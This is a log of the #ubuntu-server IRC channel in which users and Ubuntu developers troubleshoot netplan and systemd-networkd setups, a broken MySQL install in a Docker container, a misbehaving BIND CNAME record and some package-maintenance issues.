<mybalzitch> and the systemd-networkd logs stop after it renames the interface
<tomreyn> did you install 18.04.0 or 18.04.1?
<mybalzitch> 18.04.01
<tomreyn> do you have multiple NICs then?
<mybalzitch> https://0bin.net/paste/h37PDNKKR3DoTGGM#mdk6bzkx9WjCGGmAVj7U4d1WJnxC9iRyuDa4NuTez7i
<mybalzitch> no, just the one virtio device
<mybalzitch> but I use vlans
<tomreyn> mybalzitch: hmm, i'd say file a bug, using "ubuntu-bug systemd"
<tomreyn> mybalzitch: just to make sure: you had run 'netplan apply' after changing the netplan configuration and before rebooting, right?
<mybalzitch> you mean netplan generate ?
<mybalzitch> either way, yes I've run netplan apply, that's the only way to get the network working
<tomreyn> mybalzitch: i was asking whether you ran "netplan apply" (or "netplan generate") before you rebooted, to ensure the systemd-networkd configuration is updated for next reboot. since if it wasn't, i would think the previous configuration would have applied by the time you rebooted.
<soundconjurer> Greetings all, if any of you have firewall/router experience and would like t help me out. I've placed my issue here: https://pastebin.com/Z5mRQSjQ
<Gargoyle> Hey there. Given that I have a service running as someuser, what is the proper way to have that service take on the same environment parameters as if you were logged in interactively? I have a work around by using Environment="PATH=foo:bar:baz". But that means I would have to change every custom unit file whenever something is added to the users env (or even when just one env value changes).
<supercool> Hello guys!
<supercool> I am looking for a error log from mysql on ubuntu server which should be present at /var/log/mysql/error.log but the file is clear. So I wonder where is the general log file from ubuntu server please?
<tomreyn> supercool: it might change by ubuntu release and based on the mysql server variant you're using, but i would indeed expect to see it in this directory (the file might also be called 'mysql-error.log', though)
<tomreyn> supercool: if mysql fails to startup properly then logging to /var/log wont be possible and it will instead log to its data directory, so (by default) to /var/lib/mysql/(data/)
<supercool> Thank you tomreyn !
<supercool> Could someone help me figure why mysql-server is not starting here please?
<Citral> paste your error
<supercool> ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
<ahasenack> supercool: did you find the mysql error log?
<ahasenack> that line above just means mysql is not running
<supercool> ahasenack: not really. I fould some logs but nothing helpped.
#ubuntu-server 2018-09-04
<ahasenack> what do you have in /var/log/mysql* ?
<tomreyn> when you last asked the same question in #ubuntu it was suggested you take a look at https://dev.mysql.com/doc/refman/5.5/en/problems-connecting.html
<supercool> I tried to find this file /var/run/mysqld/mysqld.sock and it doesnÂ´t exist
<ahasenack> that's because the server isn't running
<supercool> I did create it and change permission but when I restart mysql it cleans up the file
<ahasenack> it's not just a missing file, that's a unix socket
<ahasenack> it's one way mysql clients can talk to the server
<ahasenack> your problem is before that
<supercool> tomreyn: I had my irc client set to not receive channel massages I guess
<supercool> I was receiving some spam and I needed to set my client and I think I changes something wrong
<supercool> ahasenack: I have error.log but nothing inportant on it and it wonÂ´t change in restart
<supercool> ahasenack: if you think it can help I can paste it somewhere
<ahasenack> what about "sudo systemctl status mysql"?
<tomreyn> supercool: ok
<tomreyn> you should probably post my.cnf and package information on the mysql server used, too
<supercool> ahasenack: service mysql status == "* MySQL is stopped."
<ahasenack> supercool: there is usually more
<ahasenack> supercool: how about this
<ahasenack> sudo systemctl start mysql
<ahasenack> then
<ahasenack> sudo systemctl status mysql
<ahasenack> and paste /var/log/mysql/error.log
<supercool> ahasenack: I donÂ´t have systemctl here. Can I use service instead?
<ahasenack> supercool: what's your ubuntu release?
<supercool> 18.04 I think
<ahasenack> then you have systemctl
<supercool> How do I find it?
<tomreyn> "lsb_release -ds" reports your ubuntu version
<ahasenack> which systemctl
<supercool> No, I mean the ubuntu release
<tomreyn> see one line above what you read last
<supercool> I donÂ´t have lsb_release
<supercool> Maybe because I install it on a docker guest
<tomreyn> cat /etc/issue
<ahasenack> and that might be related to your mysql problem
 * ahasenack -> bed
<ahasenack> good luck
<supercool> ahasenack: thank you!
<supercool> Ubuntu 18.04 LTS \n \l
<supercool> tomreyn: thank you!
<tomreyn> so it's not fully up to date.
<tomreyn> install all pending updates, see if this helps
<supercool> bash: systemctl: command not found
<tomreyn> well, your system is not properly installed
<tomreyn> how did you install it?
<supercool> I used docker
<supercool> the command was apt-get update
<supercool> I think I need a apt-get upgrade there
<supercool> Do you want to see the Dockerfile used to generate the image?
<tomreyn> "i used docker" as a response to the question "how did you install [Ubuntu]" is like saying "i use a computer" in response to the question of how you installed your OS.
<supercool> tomreyn: sorry, I donÂ´t understand your question then.
<supercool> What do you want to know with how did you install it?
<tomreyn> well docker is not only but mostly an einvironment where something can operate in. it doesn't explain how the stuff that operates in it is setup.
<tomreyn> okay, show the dockerfile
<supercool> Docker has a Ubuntu repository with a installer image. I did build a image of it on my computer
<tomreyn> were there any errors when you built it?
<supercool> Man, sorry. Docker has a repository with the official Ubuntu-server image on it.
<supercool> You just use it to remote install it on your computer.
<tomreyn> what you have there is not a proper 18.04 installation, i'm surprised it boots at all.
<supercool> I think it is a very basic install made just to boot
<supercool> Then you add apt as you wish
<supercool> This is the idea
<tomreyn> can you run "dpkg -l 'systemd*'" on this docker iinstance?
<supercool> yes, it is possible
<supercool> Could you point me a paste bin where I can put it to you please?
<tomreyn> okay, it should generate some output, tell me the lines which start with 'ii'
<tomreyn> !paste
<ubottu> For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<supercool> Here we go: https://paste.ubuntu.com/p/4wfNJSxqzq/
<supercool> I donÂ´t think that was useful at all
<tomreyn> okay, so that's ubuntu 18.04 without systemd. not a proper installation. i can't help you with this.
<supercool> I can install systemd if you wish
<tomreyn> that's not the point. neither ubuntu desktop nor ubuntu server would look like this after installation. i do not know what this system is, but it is not something i am into, and so i cannot help you with it.
<supercool> https://paste.ubuntu.com/p/FXkYSsFD4Q/
<tomreyn> yes, that's what it would normally look like
<supercool> o/
<tomreyn> i can help you install mysql on an ubuntu server installation, but that's not what you have there.
<tomreyn> maybe it's ubuntu core or something, i have no experience with this.
<supercool> Well if there is any tool not present I can go installing it
<supercool> Untill we figure whats goin on
<supercool> until*
<tomreyn> i'm not going this route, this is just try and error, not knowing what you work with.
<tomreyn> a waste of time on your and my part
<supercool> DonÂ´t fell afraid
<supercool> We can do it
<tomreyn> the only thing i'm afriad of is wasting more time on this. good luck!
<supercool> Alright. Thank you anyway tomreyn!
<tomreyn> welcome. please be sure to point out that you're experimenting with docker early in the conversation next time.
<supercool> tomreyn: Ok.
<cpaelzer> good morning
<cpaelzer> ahasenack: 3:38 my time the importer completed the catch up
<CarlenWhite> MSSQL is being really fickle tonight and I'm just considering just throwing it into a VM and never think about it again.
<CarlenWhite> Really hates ZFS with a burning passion.
<CarlenWhite> So might as well bubblewrap it inside a VM and avoid that trouble.
<lordievader> Good morning
<CarlenWhite> I was about to send an message mentioning that another server is going to have to handle requests for something and they might need to change settings. And then realized 'Oh I could just forward the port to the other server and no one has to do anything'
<CarlenWhite> Yay for...laziness.
<CarlenWhite> Or something.
<twb> debian-security-support exists in ubuntu, but I'm pretty sure it's useless.  Is that right?  Is there an Ubuntu equivalent?  (I think it used to be called update-manager-core back in 2012)
<twb> update-manager-core is already installed on this host, so I'll call that "good enough" for today.
<twb> Hrm, why does unattended-upgrades in Ubuntu 16.04 still default to only Debian origins?
<twb> Origins-Pattern "origin=Debian,codename=${distro_codename},label=Debian-Security";
<twb> That's what dpkg-configure says, but "apt-config dump" disagrees....
<TvL2386> so how do you configure a dummy0 interface on ubuntu server 18.04 using netplan
<TvL2386> not only configure, but create as well
<twb> TvL2386: I'm not familiar with netplan.  Have you already tried the obvious - check /usr/share/doc/netplan, man netplan ?
<TvL2386> yep
<TvL2386> It seems there's no such feature at the moment
<TvL2386> https://bugs.launchpad.net/netplan/+bug/1774203
<ubottu> Launchpad bug 1774203 in netplan "support for dummy interfaces" [Undecided,New]
<twb> the netplan I see in Debian seems to be for people doing finger(1) at MIT in 1987
<TvL2386> meh....
<TvL2386> what do you mean twb?
<twb> Ahhh, http://bugs.debian.org/882661
<ubottu> Debian bug 882661 in wnpp "ITP: nplan -- YAML-based network configuration tool" [Wishlist,Open]
<TvL2386> I'm not really a fan of netplan
<twb> cf. https://manpages.debian.org/netplan
<TvL2386> oh lol :)
<twb> Grr, manpages.ubuntu.com doesn't do TLS, and requires javascript or something
<twb> Here we go: http://manpages.ubuntu.com/manpages/bionic/en/man8/netplan.8.html
<TvL2386> so far my experience with netplan: pre/post hooks are not implemented and the workarounds are not working, bonding interfaces aren't removed when you remove them from your yaml file, dummy is not available
<twb> Oops that's still the silly one
<TvL2386> is there a way to revert to /etc/network/interfaces?
<twb> TvL2386: could you use some other implementation to get the same effect?
<twb> I am normally a Debian weenie who happens to be fighting an Ubuntu server today, so I dunno
<TvL2386> hehehe :)
<twb> But about 10 years ago, the important parts were "ifupdown" package and a udev rule to call net.agent
<twb> Also, systemd-networkd or network-manager can (partly) replace interfaces(5), so those might be options for you
<TvL2386> It's just a bit frustrating that all these things worked perfectly in 16.04 and it seems like netplan isn't mature yet
<TvL2386> yet /etc/network/interfaces is deprecated and not working anymore
<twb> I 100% commiserate; I had similar grief with upstart in 10.04
<TvL2386> yeah as per your bugs.debian link: netplan generates backend files in /run and hands it of the the network daemon. Which seems to be networkd on 18.04
<TvL2386> so I gotta check if I can make my own persistent "backend files"
<twb> oh!
<twb> TvL2386: if you run "networkctl" does it say unmanaged?
<TvL2386> for this particular test I created a shell script to manually conffigure stuff via root cron using @reboot :)
<TvL2386> checking
<twb> If netplan is writing systemd-networkd config in /run, then the answer is simply that you can write your own systemd-networkd config in /etc/systemd/network
<twb> I don't know if that supports dummyN but it's a place to start
<TvL2386> it only says "unanaged" for interfaces not refered in my /etc/netplan/01-netcfg.yaml
<TvL2386> ha :)
<trippeh_> it does
<twb> yay
<TvL2386> thx twb, that gives me some nice pointers to continue
<twb> the systemd index is "man systemd.directives"
<trippeh_> man systemd.netdev and systemd.network should have all the relevant parts
<twb> You can also ask #systemd (must be registered nick).  If systemd actually supports what you want to do, they will help.  If systemd doesn't do it, they'll try to trick you.
<TvL2386> nice, I see now what it does! My yaml config is used in /run/systemd/network/10-netplan-ens1f0.network
<TvL2386> among other nics
<TvL2386> hahaha twb
<TvL2386> thx trippeh_
<TvL2386> SUPPORTED NETDEV KINDS
<TvL2386>        Ã¢ÂÂdummy     Ã¢ÂÂ A dummy device drops all packets sent to it.       Ã¢ÂÂ
<TvL2386> `man systemd.netdev`
<twb> cool
<TvL2386>        Table 1. Supported kinds of virtual network devices
<TvL2386> long list :D
<twb> what's the use case for that?
<TvL2386> vxlan... nice :)
<twb> as opposed to just rp_filter and blackhole routes?
<TvL2386> well... if you wanna know: I am testing ECMP. Got a ubuntu 18.04 server which needs a loopback ip address (not ^127.*)
<TvL2386> and I wanted to add it to a dummy nic
<twb> ip address add 4.3.2.1 dev lo
<TvL2386> yeah yeah...
<TvL2386> I want dummy!
<TvL2386> ;)
<twb> fair enough, I'm just trying to understand why, for my own benefit
<TvL2386> because I thought it was easy
<twb> haha
<TvL2386> and the "lo" interface is magically configured
<TvL2386> it has 127.0.0.1/8, though no netplan config
<twb> yeah I don't know where "ip address add 172.18.77.1/22 dev lo brd +" would go in systemd-networkd
<twb> the only obvious difference is that if you did that you'd get back ICMP responses instead of just nothing
<TvL2386> I get that line until the "brd +"
<TvL2386> broadcast +?
<twb> brd + just  yep
<TvL2386> what does that do?
<TvL2386> hmmm... `grep -r 127.0.0.1 /run` does not return any hits
<TvL2386> probably somewhere else of course
<twb> http://ix.io/1iWJ
<twb> if you don't brd +, there's no broadcast address set.  Only matters if you're doing broadcasty things (e.g. mdns, I guess)
<twb> The other nice one is  "ip address add en0 192.168.1.2 peer 192.168.1.1"  if you're e.g. talking to a fresh router over a direct cable
<TvL2386> weeeeeeeeeeiiiiiiiiiirrrrdddddd
<twb> #netfilter can talk to you about that stuff if you care
<TvL2386> man ip-address : interesting that "peer"
<twb> it's a plain point-to-point so you don't need any /30 crap, like we did back in the dialup days
<TvL2386> yeah it reminds me of pppoe
<TvL2386> alrighty... back to dummy stuff
<TvL2386> or finding out how I can add ip addresses to interface lo using netplan
<TvL2386> without messing with the magical 127.0.0.1/8
<twb> TvL2386: I expect you just want to write something like printf '[Match]\nName=dummy0\n[Network]\nDHCP=yes\n' >/etc/systemd/network/fnord.network
<TvL2386> curl https://transfer.sh/gkGih/dummy.network
<TvL2386> something like that
<TvL2386> just need to find out how to "start" it
<TvL2386> did `systemctl daemon-reload`
<twb> does daemon-reload work for networkd?
<twb> I thought that only reloaded /etc/systemd/system
<TvL2386> I have no idea
<TvL2386> it was a reflex :)
<twb> I would try restarting systemd-networkd and then look at networkctl
<twb> or, read the manpage :-)
<TvL2386> yeah reading at the moment
<twb> I'm usually lazy and not in prod at that point so I just reboot the whole host
<TvL2386> yeah same here... but I feel it's in my best interest to know how this works now that /etc/network/interfaces is deprecated
<TvL2386> I made a dummy.netdev file that should generate the device
<TvL2386> I made a dummy.network file that configures it
<TvL2386> I'm looking for a way to reload networkd(?) so it "sees" this new configuration
<TvL2386> systemctl restart systemd-networkd
<TvL2386> yeah baby!
<TvL2386> # networkctl list dummy0
<TvL2386> IDX LINK             TYPE               OPERATIONAL SETUP
<TvL2386>  18 dummy0           ether              routable    configured
<TvL2386> ip a s dummy0 # looks good to
<TvL2386> cool
<TvL2386> step 2: apt-get purge netplan
<twb> nice
<twb> I did that to NM for the first like 4 years after it landed, because it routinely broke my *wired* connections on servers
<TvL2386> I'm just wondering if there's a more graceful way to alter the running configuration without completely restarting systemd-networkd
<blackflow> TvL2386: no need to purge (as that also removes some metapackages), just remove any config from /etc/netplan and it won't interfere.
<TvL2386> true blackflow
<TvL2386> The following packages will be REMOVED:
<TvL2386>   netplan.io nplan ubuntu-minimal
<twb> I assumed they wanted to remove it for the cathartic pleasure rather than any real need :-)
<TvL2386> :)
<blackflow> wrt reconfiguring networkd without restarting, there's this (still open):  https://github.com/systemd/systemd/issues/6654
<twb> like when you get an old piece annoying of kit and smash it with a hammer
<blackflow> yeah but ubuntu-minimal.... my OCD would ahve an issue with removing that :)
<TvL2386> hehehe :)
<TvL2386> I don't really care tbh
<TvL2386> Don't get me wrong, I care about your OCD, just not about ubuntu-minimal :P
<blackflow> ;)
<blackflow> netplan sounds nice on paper but in practice... I've hissed and barked at it here so it's not my intention to do that again. Gave it a chance and after several months no I still see no purpose of it. Yeah, centralized config regardless of backend, but in my experience any abstraction (and this is abstracion) is bound to either: a) do a half-assed job, or b) become extremely complex and thus
<blackflow> buggy, in order to satisfy all the functions of supported backends.
<blackflow> currently netplan is in the stage a)  as it doesn't cover all the functions.
<TvL2386> so `netplan apply` generates some .network files in /run/systemd/network and then restarts systemd-networkd
<TvL2386> that ~3sec disruption I have on applying seems to be the same as when manually restarting systemd-networkd
<TvL2386> I agree blackflow
<TvL2386> that's how I experience it as well
<TvL2386> why use netplan on ubuntu-18.04 if you can generate those .network files yourself. Have more control, less magic....
<TvL2386> same reason why I don't use ufw...
<blackflow> which btw is against systemd policy for generators, that are only supposed to generate unit files and symlinks.   and going against systemd policy is bound to introduce breakage in the future, as sd developers don't like to care about stuff they recommend against.
<TvL2386> enough whining from my side though :)
<blackflow> less is more. sometimes literally (via symlinks)   :)))
<jamespage> cpaelzer: ok so whats the purpose of lcore and pmd threads in the context of dpdk?
<cpaelzer> jamespage: cpus the threads will spin on
<cpaelzer> PMD threads are the polling mode device drivers
<cpaelzer> you want those close to the device in numa systems
<cpaelzer> lcore you can think of the management plane a bit
<cpaelzer> like allocation of memory, some extra tasks
<cpaelzer> essentially all nonPMD work it does
<cpaelzer> masks for those can be set, but you really really have to know your HW to do so correctly
<cpaelzer> (cpu masks)
<cpaelzer> TL;DR: lcore = DPDK-EAL-thread; pmd-thread = a thread of the poll mode drivers(s)
<cpaelzer> jamespage: does that explain what you needed?
<jamespage> cpaelzer: yes - I think the charm is not quite doing the right thing at the moment
<cpaelzer> jamespage: I always liked the blog kevin wrote https://developers.redhat.com/blog/2017/06/28/ovs-dpdk-parameters-dealing-with-multi-numa/
<jamespage> we set a lcore mask based on the number of cores to allocate basedon the numa topoligy
<cpaelzer> maybe that can help to get things straight
<ahasenack> good morning
<ahasenack> cpaelzer: I think I finally got hit by the glibc pending migration. DEP8 dependencies aren't installing anymore :/
<cpaelzer> ahasenack: do you know how to resolce or should I show you in a quick session?
<ahasenack> cpaelzer: this is in a bileto ticket for now
<cpaelzer> I tihnk we had that - where you called the interface ugly
<ahasenack> cpaelzer: is the solution that horrible url mangling? :)
<cpaelzer> well you can do the same in the bileto tests
<ahasenack> "interface" is a compliment :)
<cpaelzer> ahasenack: yes
<ahasenack> https://bileto.ubuntu.com/excuses/3399/cosmic.html
<ahasenack> alles kaput
<ahasenack> locally I had to enable proposed (--apt-pocket=proposed)
<ahasenack> at least then it worked
<cpaelzer> ahasenack: well that is much easier than selective unmasking then
<cpaelzer> you can to &all_proposed=1 (or it is a - instead of a _)
<ahasenack> just harder to show, in the context of a merge proposal
<ahasenack> ah, that
<ahasenack> hm, there is no "retry" icon for sssd, just freeipa, why us that?
<cpaelzer> link?
<ahasenack> just above
<ahasenack> https://bileto.ubuntu.com/excuses/3399/cosmic.html
<cpaelzer> found it
<cpaelzer> because always failed = ok
<ahasenack> well, that puts me in an odd situation
<cpaelzer> and retry is only shown in case it is not ok
<ahasenack> since there were no dep8 tests before
<ahasenack> I'm adding them for the first time
<cpaelzer> once they were successful once in the archive it will reset to expect that
<ahasenack> and there is no way to tell bileto to use cosmic-proposed for the first run?
<cpaelzer> umm
<cpaelzer> you might still be able to retrigger it
<ahasenack> "target series" should include proposed
<ahasenack> in the list, I mean
<cpaelzer> I'm just nt sure it would pick up the updated result
<cpaelzer> hmm, no you can't reset it ... :-/
<ahasenack> hmpf
<cpaelzer> "You submitted an invalid request: Package sssd does not have any test results"
<ahasenack> bileto has the chance to be so much more
<cpaelzer> is testing locally ok?
<ahasenack> yes
<ahasenack> I'm even testing a login
<ahasenack> but I want to add more
<ahasenack> cpaelzer: https://git.launchpad.net/~ahasenack/ubuntu/+source/sssd/tree/debian/tests/all-ldap?h=sssd-dep8-tests
<cpaelzer> smb: FYI iproute2 resolved
<smb> cpaelzer, yay!
<cpaelzer> 3/5 is already a much better rate
 * cpaelzer feels bad to feel good about 3/5 success rate ?!
<cpaelzer> xnox: I restarted dbus once more, that was the only one failing (timeouts, nothing critical)
<cyphermox> TvL2386: blackflow: because it's a) not magic, and b) not doing anything but writing unit files (with some small exceptions for NM+wpa, but hey) and c) some people don't know the whole syntax of systemd-networkd files, whether they should use a .network, .link, .netdev, or even a .rules file to do what they want to do.
<ahasenack> cpaelzer: https://code.launchpad.net/~ahasenack/ubuntu/+source/snapper/+git/snapper/+merge/354142 ubuntu/devel hasn't moved after the new debian/sid release was imported
<ahasenack> cpaelzer: I guess it's a bug when dealing with sync'ed packages
<cpaelzer> yes
<cpaelzer> didn't you file a bug last week?
<cpaelzer> when it came up the first time
<cpaelzer> jamespage: you might help me on an ambiguity as well
<cpaelzer> I can separate bweteen OVS and ovsdb
<cpaelzer> but those two /lib/systemd/system/openvswitch-switch.service /lib/systemd/system/ovs-vswitchd.service
<cpaelzer> it seems in the past I used the former but now have to use the latter
<jamespage> I did some work for bionic to switch to a more native aapproach
<jamespage> now you have ovsdb-server and ovs-vswitchd which are both part of openvswitch-switch
<jamespage> so restarting openvswitch-switch on old or new will dtrt
<jamespage> cpaelzer: ^^
<cpaelzer> ok'ish
<cpaelzer> thanks
<cpaelzer> that explains what happened but now I'm back at my error
<cpaelzer> :-)
<cpaelzer> jamespage: now knowing this let me try to re-catch my issue
<jamespage> coreycb: bah we have an upgrade issue on the nova-common/python-nova twiddles from queens to rocky
<cpaelzer> ahasenack: reading your MP update - should I sponsor snapper?
<cpaelzer> it really LGTM
<ahasenack> cpaelzer: yes please
<cpaelzer> and I see you can't
<cpaelzer> thought MOTU would be wih you already
<ahasenack> I also tried it on my arm "box", worked just fine
<cpaelzer> isn't that MOTU
<ahasenack> even though that one isn't armhf, it's armvl7 or something
<ahasenack> I'm not motu :(
<ahasenack> I'm.... andreas!
<cpaelzer> grml, you should be all of that by now
<ahasenack> I'm trying
<ahasenack> the dmb agenda is out of date
<ahasenack> I just pinged ubuntu-devel about it
<cpaelzer> whatever it is, edit yourself in - maybe add a section "since below is out of date extra topics: -..."
<cpaelzer> I was punted by being shy as well, it was out of date and when it was back three other topics got in front of me
<cpaelzer> ahasenack: as a verification - a0e4e65631d63fe4fcf6b5938b2dc649f5f2a00f ?
<ahasenack> ok
<ahasenack> let me check
<ahasenack> hm, no
<ahasenack> let me see what is in lp
<ahasenack> I might have pushed from my container
<ahasenack> checking
<cpaelzer> a0e4e65 is on your remote
<cpaelzer> at least from my POV
<cpaelzer> but good that we check, let me know what you find
<ahasenack> sure
<coreycb> jamespage: ok need a hand?
<ahasenack> mine has debian/sid updated pointing at 0.5.6-2, the lp mp is against ubuntu/devel
<coreycb> jamespage: was just trying to figure out the horizon build failure in cosmic
<ahasenack> c'mon git pull
 * ahasenack waits
<coreycb> jamespage: kind of odd LP doesn't show the build log
<jamespage> coreycb: some other failure hit retry
<coreycb> jamespage: ok
<ahasenack> cpaelzer: ah, I had updated dep3's last-update
<jamespage> coreycb: missing breaks/replaces
<coreycb> jamespage: ah, that'll do it
<ahasenack> will fix and ping you
<cpaelzer> ok
<raidghost> When SYSTEM is running. Ethernet card is frozen, But the system still running. Connected to monitor with hdmi, ifup shows the card is up. lshw -c network shows the enp is correct. route -n shows the routes are okey. But why does the ethernet card then not respond?
<raidghost> Running 18.04 Server LTS
<coreycb> jamespage: neutron did not get an update for python(3)-neutron -> neutron-common. think i should do that now and consolidate *.install into neutron-common.install?
<Ussat> what do you mean the ethernet card is frozen ?
<Ussat> How do you mean the ethernet card does not respond.
<raidghost> Ussat: It SUDDENTLY stop responding
<raidghost> after some days running
<Ussat> OK, assume I have no idea what youre talking about, responds HOW ? what do you expect....how is it not "responding"
<raidghost> its a onboard ethernet card
<Ussat> Loose its IP ? can ping ? I am confused here
<raidghost> I cant go on internet, cant access it localy on my network
<raidghost> not losen ip. i cant ping.
<raidghost> it looks the same way as when it was suppose to work propperly
<raidghost> example: when i try to ping my gateway (Fibermodem) i get Destination host unreachable
<raidghost> When i try to ping my server inside/outside the network i get the same message from my laptop connected to my network
<Ussat> do you still have a default route ?
<raidghost> yes
<Ussat> ifconfig still shows IP etc ?
<raidghost> yes
<Ussat> this is a laptop ?
<raidghost> No. its not a laptop. its a high tower desktop computer set as server
<Ussat> hmm...well, have a meeting in 10 mins need to go to....will be back in a hr...sorry
<raidghost> its a MSI Z270 Gaming m3 (MS-7A62) mainboard
<raidghost> https://ubuntuforums.org/showthread.php?t=2381674
<ahasenack> cpaelzer: a0e4e65631d63fe4fcf6b5938b2dc649f5f2a00f is correct, my local change is irrelevant
<cpaelzer> ok ahasenack
<cpaelzer> also the debdiff looks equal to the last MP I reviewed
<cpaelzer> ahasenack: uploaded
<ahasenack> thx
<jamespage> coreycb: ok but make sure you pull before you do - just uploaded a fix for the metadata/ssl/san/ipaddress cells v2 issue gnuoy has
<jamespage> cpaelzer: bearing in mind you have to enable dpdk in later ovs versions, do we need to have a separate -dpdk package any longer?
<jamespage> or can we just bake this into the standard binaries
<coreycb> jamespage: ok
<cpaelzer> jamespage: you wanted to keep it split to avoid regressions into "normal" OVS
<cpaelzer> but ack, given that we enable it it is much safer today
<jamespage> cpaelzer: earlier versions enabled dpdk blindly
<cpaelzer> you might remove it in an early 19.04 upload maybe
<jamespage> i.e. use the dpdk built binary, get the features
<jamespage> cpaelzer: ack I think that's an idea
<jamespage> cpaelzer: my only concern is whether it effects the CPU baseline for the binaries
<cpaelzer> I can't promise that on the initial .so load there isn't a little bit
<cpaelzer> but you can test that then ina KVM with a very scarce cpu definition
<cpaelzer> and we are two more years into ss3 being everywhere
<JeffFromOh> Hello. I have a question about the behavior of the 'shutdown' command on Ubuntu Server LTS 14.04.5. I am trying to schedule a shutdown for 12:01 am. When I schedule it, it indicates the system will be going down in XXX minutes, but then, it never returns to the command line. Which suggests to me that the scheduled shutdown is a foreground command, and if I close the putty window, the shutdown will be cancelled?
<ahasenack> yes
<JeffFromOh> By way of contrast, on OpenSuse Leap 15, if I do a schedule shutdown, I am immediately returned to the command line, and I can close the putty or terminal window, and the shutdown will not be cancelled.
<ahasenack> I don't know about this difference, but I would schedule things with "at" instead
<JeffFromOh> Yeah, I know I can use 'at' - I've done that in the past because of this issue.
<JeffFromOh> But, why is the shutdown command on Ubuntu 14.04 so braindead?
<JeffFromOh> lol
<JeffFromOh> Oh well, I'll just use 'at' to schedule it
<JeffFromOh> Anyhow, thank you for the confirmation that if I close the putty window, my scheduled shutdown would be cancelled.
<ahasenack> JeffFromOh: check the suse manpage, maybe they have
<ahasenack> n/m
<jamespage> coreycb: hmm - https://launchpadlibrarian.net/386788623/buildlog_ubuntu-cosmic-amd64.nova_2%3A18.0.0-0ubuntu3_BUILDING.txt.gz
<jamespage> that looks like one of the python 3.7 errors you hit - but its 2.7
<coreycb> jamespage: hmm and it just built ok on friday
<jamespage> coreycb: indeed!
<jamespage> and it has in the auto-backport for the UCA
 * jamespage sihgs
<coreycb> jamespage: i'd have to guess that's an intermittent error, though i don't recall seeing it with py2.7
<blackflow> cyphermox: it's actually doing more than just defining unit files, it's restarting systemd-networkd, which sd is not expecting to be done by generators. the fact "it works" is at the moment until SD changes interface/api/expectations because they don't recommend generators do that
<blackflow> cyphermox: but c) could be applied to netplan too, as seen from all the "How do I" questions. ;)
<cyphermox> blackflow: "how do I" are inevitable, networking is complicated.
<cyphermox> blackflow: you're showing that you don't really know how netplan works
<cyphermox> the generator certainly doesn't restart anything.
<coreycb> jamespage: look ok to you? would like a +1 before landing this. https://git.launchpad.net/~ubuntu-server-dev/ubuntu/+source/neutron/commit/?id=bd8410aa46a3b2f1ede353125f0c43b82081867f
<blackflow> cyphermox: I'm sorry, you're right, it doesn't restart networkd. it reloads udevd.
<blackflow> cyphermox: and also SD expects generators to generate service unit files, not network config. so, there's a bit more of expectation violation at work, for now real benefit.
<blackflow> *for no
<cyphermox> network config is a unit.
<cyphermox> anyway, it's how it is
<cyphermox> that's not going to change, because there is no other way to do what we do dynamically. My point is, nobody is forcing you to use netplan; your criticism is welcome, but better dealt with in the form of bug reports -- we do fix bugs all the time, just like in any other project
<ohms360> howdy folks, got some infrastructure running ubuntu 18.04 server and running into some DNS troubles when i'm trying to resolve a CNAME record from my DNS servers. Wanted a quick sanity check in case I'm missing a certain record
<ohms360> systemd-resolved returns this when I try to resolve this.example.tld (CNAME'd to thisArecord.example2.dlt) Sep 04 15:31:43 ws1 systemd-resolved[671]: Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.
<ohms360> nslookup of this.example.tld results in an NXDOMAIN
<ohms360> these are obfuscated - so I'm after pointers for a sanity check here
<cyphermox> sounds like the config isn't really applied on your DNS server?
<cyphermox> ohms360: you'd want to do tests first with something like dig and asking the server directly, before even going through systemd-resolved.
<ohms360> well here's the thing - if I do a dig @dnsserver it will return the NXDOMAIN but has an answer section with the CNAME
<cyphermox> ie. dig this.example.tld @servr.ip
<ohms360> let me paste an output
<ohms360> sec
<ohms360> wait
<ohms360> think I just spotted my weird behaviour
<blackflow> cyphermox: well I wasn't looking for an argument, I was just discussing its usefulness (or lack thereof) with TvL2386.
<ohms360> looks like somehow it's appending .example.tld onto the CNAME target
<blackflow> ohms360: you forgot an end dot? it'd be great if you could paste the real zone data
<ohms360> i should probably read my dig outputs carefully before spamming IRC... thanks for the sanity check
<ohms360> i'll paste it obfuscated - bear with me while i search/replace
<cyphermox> it does sound like a missing . at the end
<cyphermox> (in the DNS server's config, mind you)
<ohms360> source.example.tld.	IN	CNAME	cname.target.tld.
<ohms360>  is what's in bind
<blackflow> ohms360: two completely different domains and subdomains?
<ohms360> yeah
<ohms360> my answer section is looking as such: ;; ANSWER SECTION:
<ohms360> source.example.tld. 2 IN     CNAME   cname.target.tld.example.tld.
<ohms360> not quite sure how the example.tld. is getting appended
<blackflow> appended to what?
<ohms360> the answer should look like
<blackflow> it's in your config right there, if that line is from the zone
<ohms360> ANSWER SECTION:
<ohms360> <ohms360> source.example.tld. 2 IN     CNAME   cname.target.tld
<blackflow> yeah well... what's the ZONE file? please pastebin that. and if you _have_ to obfuscate, please do it consistently.
<ohms360> https://pastebin.com/DGwUJmUF
<ohms360> https://pastebin.com/g9JMfLyj
<blackflow> 5 second TTLs? also your answer has that 2 before IN ... 2 seconds? not defined in this zone. have you reloaded bind after zone change?
<JanC> looks like you might be missing a dot in the end somewhere
<JanC> or something like that
<cyphermox> JanC: nope. :)
<ohms360> yes bind has been reloaded
<blackflow> ohms360: are you querying the correct server? are they syncing among themselves, there's 3 NS listed in the zone
<ohms360> yes
<blackflow> because your answer contains a 2 second TTL which is not in this zone, so whichever server responded, is not the one with this config.
<ohms360> could that not be the destination TTL?
<blackflow> can you pastebin the whole response to dig?
<blackflow> obfuscate if you have to... consistently.
<blackflow> no, that's not destination TTL because it's part of the CNAME rr for source.example.tld.
<ohms360> the real question is why would it be appending the example.tld to target.tld
<blackflow> because that zone file is NOT the config for the server that is responding to your queries.
<blackflow> so, please pastebin the output of dig too.
<blackflow> (and the dig command you used, esp. @ part, so obfuscate consistently)
<blackflow> ohms360:   also.....   dig +multi region.example1.tld. SOA    and inspect the serial number, is it correct? matching the one in your pastebin, eg.  1532588522   ?
<kstenerud> question about uvt-kvm: When I uvt-kvm ssh into a server I created on one machine, it works. When I try on a different server, I get permission denide (publickey). Is there a configuration I need to set to make it work?
